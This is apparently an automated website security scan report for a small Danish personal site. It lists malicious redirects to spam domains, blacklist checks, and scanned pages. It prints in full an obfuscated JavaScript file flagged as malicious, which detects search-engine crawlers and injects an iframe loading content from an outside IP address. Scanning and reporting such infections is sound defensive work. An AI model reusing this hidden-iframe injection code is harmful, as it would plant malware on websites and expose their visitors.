Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://vestervang9.dk/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vestervang9.dk Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Tue, 23 Sep 2014 16:00:24 GMT Location: http://nikefreedk.whichbegforthatsort.info/ Server: Microsoft-IIS/6.0 Content-Length: 164 Content-Type: text/html Set-Cookie: ASPSESSIONIDSATBQTCD=ODHHJIHANHDBLCDMMPNIAEFC; path=/ X-Powered-By: ASP.NET | malicious |
URL: http://nikefreedk.whichbegforthatsort.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: nikefreedk.whichbegforthatsort.info Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 23 Sep 2014 16:00:26 GMT Location: http://www.freerunningskodame.com/ Server: Apache/2 Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://vestervang9.dk/ | 200 OK Content-Length: 12291 Content-Type: text/html | clean |
http://vestervang9.dk/DeBedste\images\100_0007.js | 200 OK Content-Length: 987 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var HbgHGa1 = 0;var UFFC2 = navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"];UFFC2 = UFFC2["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]();var cZOEmDCvK3 = new window["\x41\x72\x72\x61\x79"]();cZOEmDCvK3[1] = '\x67\x6f\x6f\x67\x6c\x65\x62\x6f\x74';cZOEmDCvK3[2] = '\x61\x6f\x6c';cZOEmDCvK3[3] = '\x61\x73\x6b';cZOEmDCvK3[4] = '\x79\x61\x68\x6f\x6f';cZOEmDCvK3[5] = '\x62\x69\x6e\x67';for(k in cZOEmDCvK3){ if(UFFC2["\x69\x6e\x64\x65\x78\x4f\x66"](cZOEmDCvK3[k])>0) { HbgHGa1 = 1; break; }}if(HbgHGa1==1){ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x39\x38\x2e\x31\x35\x39\x2e\x31\x30\x35\x2e\x36\x30\x2f\x6c\x6b\x33\x2e\x68\x74\x6d\x6c\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\" \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x30 \x77\x69\x64\x74\x68\x3d\"\x39\x30\x30\" \x68\x65\x69\x67\x68\x74\x3d\"\x34\x38\x30\"\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");} Antivirus reports:
| ||
http://vestervang9.dk/animate.js | 200 OK Content-Length: 14261 Content-Type: application/x-javascript | clean |
http://vestervang9.dk/../DeBedste/index.html | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://vestervang9.dk/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://vestervang9.dk/../Vielsen/index.html | 403 Forbidden Content-Length: 32 Content-Type: text/html | clean |
http://vestervang9.dk/indexA.htm | 200 OK Content-Length: 7453 Content-Type: text/html | clean |
http://vestervang9.dk/index_2.htm | 200 OK Content-Length: 6091 Content-Type: text/html | clean |
http://vestervang9.dk/index.htm | 200 OK Content-Length: 12291 Content-Type: text/html | clean |
http://vestervang9.dk/pages/Lone%201997.htm | 200 OK Content-Length: 1840 Content-Type: text/html | clean |
http://vestervang9.dk/pages/Lone%20%26%20Bella%20Juni%202002.htm | 200 OK Content-Length: 1916 Content-Type: text/html | clean |
http://vestervang9.dk/pages/Lone%20%26%20Bella%20-%20august%202002.htm | 200 OK Content-Length: 1944 Content-Type: text/html | clean |
http://vestervang9.dk/pages/Kent%20ved%20Askovs%20f%F8l.htm | 200 OK Content-Length: 1929 Content-Type: text/html | clean |
http://vestervang9.dk/pages/Kent%20p%E5%20Karlsbroen%20i%20Prag.htm | 200 OK Content-Length: 1918 Content-Type: text/html | clean |
http://vestervang9.dk/pages/Kent%2045.htm | 200 OK Content-Length: 1833 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vestervang9.dk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vestervang9.dk/
Result: vestervang9.dk is not infected or malware details are not published yet.
Result: vestervang9.dk is not infected or malware details are not published yet.